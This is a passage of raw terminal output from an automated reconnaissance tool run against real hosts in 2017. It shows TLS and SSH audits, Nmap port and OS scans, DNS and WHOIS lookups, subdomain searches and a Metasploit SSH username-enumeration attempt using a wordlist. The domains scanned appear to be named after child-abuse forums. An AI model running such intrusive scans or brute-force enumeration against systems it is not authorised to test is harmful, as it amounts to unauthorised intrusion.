3330 x6b DHE-RSA-AES256-SHA256 DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA256
3331 x39 DHE-RSA-AES256-SHA DH[0;32m 2048[m AES 256 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
3332 xc02f ECDHE-RSA-AES128-GCM-SHA256 ECDH[0;32m 256[m AESGCM 128 TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256
3333 x9e DHE-RSA-AES128-GCM-SHA256 DH[0;32m 2048[m AESGCM 128 TLS_DHE_RSA_WITH_AES_128_GCM_SHA256
3334
3335
3336[1m[4m Running client simulations via sockets [m
3337
3338 Android 2.3.7 No connection
3339 Android 4.1.1 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3340 Android 4.3 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3341 Android 4.4.2 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3342 Android 5.0.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
3343 Android 6.0 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
3344 Android 7.0 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3345 Chrome 51 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3346 Chrome 57 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3347 Firefox 49 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3348 Firefox 53 Win 7 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3349 IE 6 XP No connection
3350 IE 7 Vista TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3351 IE 8 XP No connection
3352 IE 8 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3353 IE 11 Win 7 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3354 IE 11 Win 8.1 TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3355 IE 11 Win Phone 8.1 Update TLSv1.2 DHE-RSA-AES256-GCM-SHA384, [0;32m2048 bit DH[m
3356 IE 11 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3357 Edge 13 Win 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3358 Edge 13 Win Phone 10 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3359 Opera 17 Win 7 TLSv1.2 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3360 Safari 5.1.9 OS X 10.6.8 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3361 Safari 7 iOS 7.1 TLSv1.2 ECDHE-RSA-AES256-SHA384, [0;32m256 bit ECDH (P-256)[m
3362 Safari 9 OS X 10.11 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3363 Safari 10 OS X 10.12 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3364 Apple ATS 9 iOS 9 TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3365 Tor 17.0.9 Win 7 TLSv1.0 ECDHE-RSA-AES256-SHA, [0;32m256 bit ECDH (P-256)[m
3366 Java 6u45 No connection
3367 Java 7u25 No connection
3368 Java 8u31 TLSv1.2 ECDHE-RSA-AES128-GCM-SHA256, [0;32m256 bit ECDH (P-256)[m
3369 OpenSSL 1.0.1l TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3370 OpenSSL 1.0.2e TLSv1.2 ECDHE-RSA-AES256-GCM-SHA384, [0;32m256 bit ECDH (P-256)[m
3371
3372[7m Done 2017-11-30 01:02:27 [1966s] -->> 178.33.115.32:443 (pedoforums.omgforum.net) <<--[m
3373
3374-----------------------------------------------------
3375[1mDone testing now all IP addresses (on port 443): [m94.23.73.212 94.23.159.185 94.23.76.111 178.33.44.177 178.33.43.178 178.33.43.150 94.23.150.222
3376#######################################################################################################################################
3377Nom de l'hôte pedo-paradise.myminicity.fr FAI OVH S (AS16276)
3378Continent Europe Drapeau
3379FR
3380Pays France Code du pays FR (FRA)
3381Région Inconnu Heure locale 30 Nov 2017 06:51 CET
3382Ville Inconnu Latitude 48.858
3383Adresse IP 178.32.123.64 Longitude 2.339
3384######################################################################################################################################
3385[i] Scanning Site: http://pedo-paradise.myminicity.fr
3386
3387
3388
3389B A S I C I N F O
3390====================
3391
3392
3393[+] Site Title: MyMiniCity
3394[+] IP address: 178.32.123.64
3395[+] Web Server: Apache
3396[+] CMS: Could Not Detect
3397[+] Cloudflare: Not Detected
3398[+] Robots File: Could NOT Find robots.txt!
3399
3400
3401
3402
3403W H O I S L O O K U P
3404========================
3405
3406 %%
3407%% This is the AFNIC Whois server.
3408%%
3409%% complete date format : DD/MM/YYYY
3410%% short date format : DD/MM
3411%% version : FRNIC-2.5
3412%%
3413%% Rights restricted by copyright.
3414%% See https://www.afnic.fr/en/products-and-services/services/whois/whois-special-notice/
3415%%
3416%% Use '-h' option to obtain more information about this service.
3417%%
3418%% [2604:0180:0002:0d7d:0000:0000:0000:e3d6 REQUEST] >> -V Md5.1 pedo-paradise.myminicity.fr
3419%%
3420%% RL Net [##########] - RL IP [#########.]
3421%%
3422
3423%% No entries found in the AFNIC Database.
3424
3425
3426
3427
3428
3429G E O I P L O O K U P
3430=========================
3431
3432[i] IP Address: 178.32.123.64
3433[i] Country: FR
3434[i] State: N/A
3435[i] City: N/A
3436[i] Latitude: 48.858200
3437[i] Longitude: 2.338700
3438
3439
3440
3441
3442H T T P H E A D E R S
3443=======================
3444
3445
3446[i] HTTP/1.1 200 OK
3447[i] Date: Thu, 30 Nov 2017 05:55:15 GMT
3448[i] Server: Apache
3449[i] Cache-Control: no-store, no-cache, must-revalidate
3450[i] Pragma: no-cache
3451[i] Expires: Mon, 26 Jul 1997 05:00:00 GMT
3452[i] P3P: CP="ALL DSP COR NID CURa OUR STP PUR"
3453[i] Vary: Accept-Encoding
3454[i] Content-Length: 563
3455[i] Connection: close
3456[i] Content-Type: text/html; Charset=UTF-8
3457
3458
3459
3460
3461D N S L O O K U P
3462===================
3463
3464pedo-paradise.myminicity.fr. 299 IN A 178.32.123.64
3465
3466
3467
3468
3469S U B N E T C A L C U L A T I O N
3470====================================
3471
3472Address = 178.32.123.64
3473Network = 178.32.123.64 / 32
3474Netmask = 255.255.255.255
3475Broadcast = not needed on Point-to-Point links
3476Wildcard Mask = 0.0.0.0
3477Hosts Bits = 0
3478Max. Hosts = 1 (2^0 - 0)
3479Host Range = { 178.32.123.64 - 178.32.123.64 }
3480
3481
3482
3483N M A P P O R T S C A N
3484============================
3485
3486
3487Starting Nmap 7.01 ( https://nmap.org ) at 2017-11-30 05:55 UTC
3488Nmap scan report for pedo-paradise.myminicity.fr (178.32.123.64)
3489Host is up (0.082s latency).
3490rDNS record for 178.32.123.64: ip64.ip-178-32-123.eu
3491PORT STATE SERVICE VERSION
349221/tcp filtered ftp
349322/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
349423/tcp filtered telnet
349525/tcp filtered smtp
349680/tcp open http Apache httpd
3497110/tcp filtered pop3
3498143/tcp filtered imap
3499443/tcp open ssl/ssl Apache httpd (SSL-only mode)
3500445/tcp filtered microsoft-ds
35013389/tcp filtered ms-wbt-server
3502Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3503
3504Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3505Nmap done: 1 IP address (1 host up) scanned in 15.06 seconds
3506
3507% This is the RIPE Database query service.
3508% The objects are in RPSL format.
3509%
3510% The RIPE Database is subject to Terms and Conditions.
3511% See http://www.ripe.net/db/support/db-terms-conditions.pdf
3512
3513% Note: this output has been filtered.
3514% To receive output for a database update, use the "-B" flag.
3515
3516% Information related to '178.32.96.0 - 178.32.127.255'
3517
3518% Abuse contact for '178.32.96.0 - 178.32.127.255' is 'abuse@ovh.net'
3519
3520inetnum: 178.32.96.0 - 178.32.127.255
3521netname: OVH
3522descr: OVH SAS
3523descr: Dedicated Servers
3524descr: http://www.ovh.com
3525country: FR
3526admin-c: OK217-RIPE
3527tech-c: OTC2-RIPE
3528status: ASSIGNED PA
3529mnt-by: OVH-MNT
3530created: 2010-03-19T17:06:09Z
3531last-modified: 2010-03-19T17:06:09Z
3532source: RIPE
3533
3534role: OVH Technical Contact
3535address: OVH SAS
3536address: 2 rue Kellermann
3537address: 59100 Roubaix
3538address: France
3539admin-c: OK217-RIPE
3540tech-c: GM84-RIPE
3541tech-c: SL10162-RIPE
3542nic-hdl: OTC2-RIPE
3543abuse-mailbox: abuse@ovh.net
3544mnt-by: OVH-MNT
3545created: 2004-01-28T17:42:29Z
3546last-modified: 2014-09-05T10:47:15Z
3547source: RIPE # Filtered
3548
3549person: Octave Klaba
3550address: OVH SAS
3551address: 2 rue Kellermann
3552address: 59100 Roubaix
3553address: France
3554phone: +33 9 74 53 13 23
3555nic-hdl: OK217-RIPE
3556mnt-by: OVH-MNT
3557created: 1970-01-01T00:00:00Z
3558last-modified: 2017-10-30T21:44:51Z
3559source: RIPE # Filtered
3560
3561% Information related to '178.32.0.0/15AS16276'
3562
3563route: 178.32.0.0/15
3564descr: OVH ISP
3565descr: Paris, France
3566origin: AS16276
3567mnt-by: OVH-MNT
3568created: 2010-01-19T16:39:43Z
3569last-modified: 2010-01-19T16:39:43Z
3570source: RIPE # Filtered
3571
3572% This query was served by the RIPE Database Query Service version 1.90 (ANGUS)
3573
3574[92m + -- ----------------------------=[Running Nslookup]=------------------------ -- +[0m
3575Server: 2001:568:ff09:10c::53
3576Address: 2001:568:ff09:10c::53#53
3577
3578Non-authoritative answer:
3579Name: pedo-paradise.myminicity.fr
3580Address: 178.32.123.64
3581
3582pedo-paradise.myminicity.fr has address 178.32.123.64
3583[92m + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +[0m
3584
3585Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
3586
3587[+] Target is pedo-paradise.myminicity.fr
3588[+] Loading modules.
3589[+] Following modules are loaded:
3590[x] [1] ping:icmp_ping - ICMP echo discovery module
3591[x] [2] ping:tcp_ping - TCP-based ping discovery module
3592[x] [3] ping:udp_ping - UDP-based ping discovery module
3593[x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
3594[x] [5] infogather:portscan - TCP and UDP PortScanner
3595[x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
3596[x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
3597[x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
3598[x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
3599[x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
3600[x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
3601[x] [12] fingerprint:smb - SMB fingerprinting module
3602[x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
3603[+] 13 modules registered
3604[+] Initializing scan engine
3605[+] Running scan engine
3606[-] ping:tcp_ping module: no closed/open TCP ports known on 178.32.123.64. Module test failed
3607[-] ping:udp_ping module: no closed/open UDP ports known on 178.32.123.64. Module test failed
3608[-] No distance calculation. 178.32.123.64 appears to be dead or no ports known
3609[+] Host: 178.32.123.64 is up (Guess probability: 50%)
3610[+] Target: 178.32.123.64 is alive. Round-Trip Time: 0.49555 sec
3611[+] Selected safe Round-Trip Time value is: 0.99110 sec
3612[-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
3613[-] fingerprint:smb need either TCP port 139 or 445 to run
3614[+] Primary guess:
3615[+] Host 178.32.123.64 Running OS: (Guess probability: 100%)
3616[+] Other guesses:
3617[+] Host 178.32.123.64 Running OS: (Guess probability: 91%)
3618[+] Host 178.32.123.64 Running OS: ¯{1V (Guess probability: 91%)
3619[+] Host 178.32.123.64 Running OS: (Guess probability: 91%)
3620[+] Host 178.32.123.64 Running OS: (Guess probability: 91%)
3621[+] Host 178.32.123.64 Running OS: (Guess probability: 91%)
3622[+] Host 178.32.123.64 Running OS: (Guess probability: 91%)
3623[+] Host 178.32.123.64 Running OS: (Guess probability: 91%)
3624[+] Host 178.32.123.64 Running OS: ¯{1V (Guess probability: 91%)
3625[+] Host 178.32.123.64 Running OS: ¯{1V (Guess probability: 91%)
3626[+] Cleaning up scan engine
3627[+] Modules deinitialized
3628[+] Execution completed.
3629[92m + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +[0m
3630%%
3631%% This is the AFNIC Whois server.
3632%%
3633%% complete date format : DD/MM/YYYY
3634%% short date format : DD/MM
3635%% version : FRNIC-2.5
3636%%
3637%% Rights restricted by copyright.
3638%% See https://www.afnic.fr/en/products-and-services/services/whois/whois-special-notice/
3639%%
3640%% Use '-h' option to obtain more information about this service.
3641%%
3642%% [2001:056b:dcca:e100:0029:b875:90ac:681a REQUEST] >> -V Md5.2 pedo-paradise.myminicity.fr
3643%%
3644%% RL Net [##########] - RL IP [#########.]
3645%%
3646
3647%% No entries found in the AFNIC Database.
3648
3649[92m + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +[0m
3650
3651*******************************************************************
3652* *
3653* | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
3654* | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
3655* | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
3656* \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
3657* *
3658* TheHarvester Ver. 2.7 *
3659* Coded by Christian Martorella *
3660* Edge-Security Research *
3661* cmartorella@edge-security.com *
3662*******************************************************************
3663
3664
3665[-] Searching in Bing:
3666 Searching 50 results...
3667 Searching 100 results...
3668
3669
3670[+] Emails found:
3671------------------
3672No emails found
3673
3674[+] Hosts found in search engines:
3675------------------------------------
3676No hosts found
3677[92m + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +[0m
3678
3679; <<>> DiG 9.10.6-Debian <<>> -x pedo-paradise.myminicity.fr
3680;; global options: +cmd
3681;; Got answer:
3682;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 34299
3683;; flags: qr rd ra; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
3684
3685;; OPT PSEUDOSECTION:
3686; EDNS: version: 0, flags:; udp: 4096
3687;; QUESTION SECTION:
3688;fr.myminicity.pedo-paradise.in-addr.arpa. IN PTR
3689
3690;; AUTHORITY SECTION:
3691in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017102443 1800 900 604800 3600
3692
3693;; Query time: 645 msec
3694;; SERVER: 2001:568:ff09:10c::53#53(2001:568:ff09:10c::53)
3695;; WHEN: Thu Nov 30 00:55:50 EST 2017
3696;; MSG SIZE rcvd: 137
3697
3698dnsenum VERSION:1.2.4
3699[1;34m
3700----- pedo-paradise.myminicity.fr -----
3701[0m[1;31m
3702
3703Host's addresses:
3704__________________
3705
3706[0mpedo-paradise.myminicity.fr. 16 IN A 178.32.123.64
3707[1;31m
3708
3709Wildcard detection using: sfbtxlqpknqk
3710_______________________________________
3711
3712[0msfbtxlqpknqk.pedo-paradise.myminicity.fr. 300 IN A 178.32.123.64
3713[1;31m
3714
3715!!!!!!!!!!!!!!!!!!!!!!!!!!!!
3716
3717 Wildcards detected, all subdomains will point to the same IP address
3718 Omitting results containing 178.32.123.64.
3719 Maybe you are using OpenDNS servers.
3720
3721!!!!!!!!!!!!!!!!!!!!!!!!!!!!
3722[0m[1;31m
3723
3724Name Servers:
3725______________
3726
3727[0m[92m + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +[0m
3728[91m
3729 ____ _ _ _ _ _____
3730 / ___| _ _| |__ | (_)___| |_|___ / _ __
3731 \___ \| | | | '_ \| | / __| __| |_ \| '__|
3732 ___) | |_| | |_) | | \__ \ |_ ___) | |
3733 |____/ \__,_|_.__/|_|_|___/\__|____/|_|[0m[93m
3734
3735 # Coded By Ahmed Aboul-Ela - @aboul3la
3736
3737[94m[-] Enumerating subdomains now for pedo-paradise.myminicity.fr[0m
3738[93m[-] verbosity is enabled, will show the subdomains results in realtime[0m
3739[92m[-] Searching now in Baidu..[0m
3740[92m[-] Searching now in Yahoo..[0m
3741[92m[-] Searching now in Google..[0m
3742[92m[-] Searching now in Bing..[0m
3743[92m[-] Searching now in Ask..[0m
3744[92m[-] Searching now in Netcraft..[0m
3745[92m[-] Searching now in DNSdumpster..[0m
3746[92m[-] Searching now in Virustotal..[0m
3747[92m[-] Searching now in ThreatCrowd..[0m
3748[92m[-] Searching now in SSL Certificates..[0m
3749[92m[-] Searching now in PassiveDNS..[0m
3750
3751[91m ╔â•Â╗╩â•Â╗╔╩╗╔â•Â╗╩╩[0m
3752[91m ║ ╠╩╠║ ╚â•Â╗╠â•Â╣[0m
3753[91m ╚â•Ââ•Â╩╚╠╩o╚â•Ââ•Â╩ ╩[0m
3754[91m + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +[0m
3755[94m
3756[91m [+] Domains saved to: /usr/share/sniper/loot/domains/domains-pedo-paradise.myminicity.fr-full.txt
3757[0m
3758[92m + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +[0m
3759[92m + -- ----------------------------=[Checking Email Security]=----------------- -- +[0m
3760
3761[92m + -- ----------------------------=[Pinging host]=---------------------------- -- +[0m
3762PING pedo-paradise.myminicity.fr (178.32.123.64) 56(84) bytes of data.
376364 bytes from ip64.ip-178-32-123.eu (178.32.123.64): icmp_seq=1 ttl=57 time=145 ms
3764
3765--- pedo-paradise.myminicity.fr ping statistics ---
37661 packets transmitted, 1 received, 0% packet loss, time 0ms
3767rtt min/avg/max/mdev = 145.995/145.995/145.995/0.000 ms
3768
3769[92m + -- ----------------------------=[Running TCP port scan]=------------------- -- +[0m
3770
3771Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-30 00:56 EST
3772Nmap scan report for pedo-paradise.myminicity.fr (178.32.123.64)
3773Host is up (0.13s latency).
3774rDNS record for 178.32.123.64: ip64.ip-178-32-123.eu
3775Not shown: 470 filtered ports
3776Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
3777PORT STATE SERVICE
377822/tcp open ssh
377980/tcp open http
3780443/tcp open https
3781
3782Nmap done: 1 IP address (1 host up) scanned in 14.71 seconds
3783
3784[92m + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +[0m
3785[91m + -- --=[Port 21 closed... skipping.[0m
3786[93m + -- --=[Port 22 opened... running tests...[0m
3787# general
3788(gen) banner: SSH-2.0-OpenSSH_7.2p2 Ubuntu-4ubuntu2.2
3789(gen) software: OpenSSH 7.2p2
3790(gen) compatibility: OpenSSH 7.2+, Dropbear SSH 2013.62+
3791(gen) compression: enabled (zlib@openssh.com)
3792
3793# key exchange algorithms
3794(kex) curve25519-sha256@libssh.org -- [info] available since OpenSSH 6.5, Dropbear SSH 2013.62
3795(kex) ecdh-sha2-nistp256 -- [fail] using weak elliptic curves
3796 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
3797(kex) ecdh-sha2-nistp384 -- [fail] using weak elliptic curves
3798 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
3799(kex) ecdh-sha2-nistp521 -- [fail] using weak elliptic curves
3800 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
3801(kex) diffie-hellman-group-exchange-sha256 -- [warn] using custom size modulus (possibly weak)
3802 `- [info] available since OpenSSH 4.4
3803(kex) diffie-hellman-group14-sha1 -- [warn] using weak hashing algorithm
3804 `- [info] available since OpenSSH 3.9, Dropbear SSH 0.53
3805
3806# host-key algorithms
3807(key) ssh-rsa -- [info] available since OpenSSH 2.5.0, Dropbear SSH 0.28
3808(key) rsa-sha2-512 -- [info] available since OpenSSH 7.2
3809(key) rsa-sha2-256 -- [info] available since OpenSSH 7.2
3810(key) ecdsa-sha2-nistp256 -- [fail] using weak elliptic curves
3811 `- [warn] using weak random number generator could reveal the key
3812 `- [info] available since OpenSSH 5.7, Dropbear SSH 2013.62
3813(key) ssh-ed25519 -- [info] available since OpenSSH 6.5
3814
3815# encryption algorithms (ciphers)
3816(enc) chacha20-poly1305@openssh.com -- [info] available since OpenSSH 6.5
3817 `- [info] default cipher since OpenSSH 6.9.
3818(enc) aes128-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
3819(enc) aes192-ctr -- [info] available since OpenSSH 3.7
3820(enc) aes256-ctr -- [info] available since OpenSSH 3.7, Dropbear SSH 0.52
3821(enc) aes128-gcm@openssh.com -- [info] available since OpenSSH 6.2
3822(enc) aes256-gcm@openssh.com -- [info] available since OpenSSH 6.2
3823
3824# message authentication code algorithms
3825(mac) umac-64-etm@openssh.com -- [warn] using small 64-bit tag size
3826 `- [info] available since OpenSSH 6.2
3827(mac) umac-128-etm@openssh.com -- [info] available since OpenSSH 6.2
3828(mac) hmac-sha2-256-etm@openssh.com -- [info] available since OpenSSH 6.2
3829(mac) hmac-sha2-512-etm@openssh.com -- [info] available since OpenSSH 6.2
3830(mac) hmac-sha1-etm@openssh.com -- [warn] using weak hashing algorithm
3831 `- [info] available since OpenSSH 6.2
3832(mac) umac-64@openssh.com -- [warn] using encrypt-and-MAC mode
3833 `- [warn] using small 64-bit tag size
3834 `- [info] available since OpenSSH 4.7
3835(mac) umac-128@openssh.com -- [warn] using encrypt-and-MAC mode
3836 `- [info] available since OpenSSH 6.2
3837(mac) hmac-sha2-256 -- [warn] using encrypt-and-MAC mode
3838 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
3839(mac) hmac-sha2-512 -- [warn] using encrypt-and-MAC mode
3840 `- [info] available since OpenSSH 5.9, Dropbear SSH 2013.56
3841(mac) hmac-sha1 -- [warn] using encrypt-and-MAC mode
3842 `- [warn] using weak hashing algorithm
3843 `- [info] available since OpenSSH 2.1.0, Dropbear SSH 0.28
3844
3845# algorithm recommendations (for OpenSSH 7.2)
3846(rec) -ecdh-sha2-nistp521 -- kex algorithm to remove
3847(rec) -ecdh-sha2-nistp384 -- kex algorithm to remove
3848(rec) -ecdh-sha2-nistp256 -- kex algorithm to remove
3849(rec) -diffie-hellman-group14-sha1 -- kex algorithm to remove
3850(rec) -ecdsa-sha2-nistp256 -- key algorithm to remove
3851(rec) -hmac-sha2-512 -- mac algorithm to remove
3852(rec) -umac-128@openssh.com -- mac algorithm to remove
3853(rec) -hmac-sha2-256 -- mac algorithm to remove
3854(rec) -umac-64@openssh.com -- mac algorithm to remove
3855(rec) -hmac-sha1 -- mac algorithm to remove
3856(rec) -hmac-sha1-etm@openssh.com -- mac algorithm to remove
3857(rec) -umac-64-etm@openssh.com -- mac algorithm to remove
3858
3859
3860Starting Nmap 7.60 ( https://nmap.org ) at 2017-11-30 00:57 EST
3861NSE: [ssh-run] Failed to specify credentials and command to run.
3862Nmap scan report for pedo-paradise.myminicity.fr (178.32.123.64)
3863Host is up (0.12s latency).
3864rDNS record for 178.32.123.64: ip64.ip-178-32-123.eu
3865
3866PORT STATE SERVICE VERSION
386722/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
3868| ssh-auth-methods:
3869| Supported authentication methods:
3870|_ publickey
3871|_ssh-brute: Password authenication not allowed
3872| ssh-hostkey:
3873| 2048 35:f0:fd:8b:c8:39:9b:cb:8d:4f:26:a3:ba:a8:93:3f (RSA)
3874| 256 4a:a3:7e:b8:0b:79:c9:34:ea:ff:f4:d2:d6:03:3d:33 (ECDSA)
3875|_ 256 85:87:3f:c4:7a:70:37:9e:ba:5d:fe:e8:7a:47:83:02 (EdDSA)
3876|_ssh-publickey-acceptance: ERROR: Script execution failed (use -d to debug)
3877|_ssh-run: Failed to specify credentials and command to run.
3878Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
3879Device type: general purpose
3880Running (JUST GUESSING): Linux 3.X|4.X|2.6.X (91%)
3881OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4 cpe:/o:linux:linux_kernel:2.6.39
3882Aggressive OS guesses: Linux 3.11 - 4.1 (91%), Linux 3.2.0 (90%), Linux 3.13 (87%), Linux 2.6.39 (87%), Linux 2.6.18 - 2.6.22 (86%), Linux 3.16 (86%), Linux 3.10 - 3.12 (85%), Linux 3.10 - 4.8 (85%), Linux 3.12 (85%), Linux 3.13 or 4.2 (85%)
3883No exact OS matches for host (test conditions non-ideal).
3884Network Distance: 8 hops
3885Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
3886
3887TRACEROUTE (using port 22/tcp)
3888HOP RTT ADDRESS
38891 109.91 ms 10.13.0.1
38902 124.40 ms 37.187.24.252
38913 109.95 ms po101.gra-g1-a75.fr.eu (178.33.103.229)
38924 109.93 ms be5.gra-z1g1-a75.fr.eu (37.187.232.75)
38935 109.94 ms 10.97.155.50
38946 109.42 ms 51.255.254.71
38957 109.41 ms 149.202.255.5
38968 109.97 ms ip64.ip-178-32-123.eu (178.32.123.64)
3897
3898OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
3899Nmap done: 1 IP address (1 host up) scanned in 29.35 seconds
3900[0m[36m[0m
3901 ______________________________________________________________________________
3902| |
3903| [1m3Kom SuperHack II Logon[0m |
3904|______________________________________________________________________________|
3905| |
3906| |
3907| |
3908| User Name: [ [31msecurity[0m ] |
3909| |
3910| Password: [ ] |
3911| |
3912| |
3913| |
3914| [1m[ OK ][0m |
3915|______________________________________________________________________________|
3916| |
3917| https://metasploit.com |
3918|______________________________________________________________________________|[0m
3919[0m
3920
3921 =[ [33mmetasploit v4.16.19-dev[0m ]
3922+ -- --=[ 1704 exploits - 970 auxiliary - 299 post ]
3923+ -- --=[ 503 payloads - 40 encoders - 10 nops ]
3924+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]
3925
3926[0m[0mUSER_FILE => /usr/share/brutex/wordlists/simple-users.txt
3927[0mRHOSTS => pedo-paradise.myminicity.fr
3928[0m[1m[33m[!][0m RHOST is not a valid option for this module. Did you mean RHOSTS?
3929RHOST => pedo-paradise.myminicity.fr
3930[0m[1m[34m[*][0m 178.32.123.64:22 - SSH - Checking for false positives
3931[1m[34m[*][0m 178.32.123.64:22 - SSH - Starting scan
3932[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'admin' not found
3933[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'administrator' not found
3934[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'anonymous' not found
3935[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'backup' not found
3936[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'bee' not found
3937[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'ftp' not found
3938[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'guest' not found
3939[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'GUEST' not found
3940[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'info' not found
3941[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'mail' not found
3942[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'mailadmin' not found
3943[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'msfadmin' not found
3944[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'mysql' not found
3945[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'nobody' not found
3946[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'oracle' not found
3947[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'owaspbwa' not found
3948[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'postfix' not found
3949[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'postgres' not found
3950[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'private' not found
3951[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'proftpd' not found
3952[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'public' not found
3953[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'root' not found
3954[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'superadmin' not found
3955[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'support' not found
3956[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'sys' not found
3957[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'system' not found
3958[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'systemadmin' not found
3959[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'systemadministrator' not found
3960[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'test' not found
3961[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'tomcat' not found
3962[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'user' not found
3963[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'webmaster' not found
3964[1m[31m[-][0m 178.32.123.64:22 - SSH - User 'www-data' not found
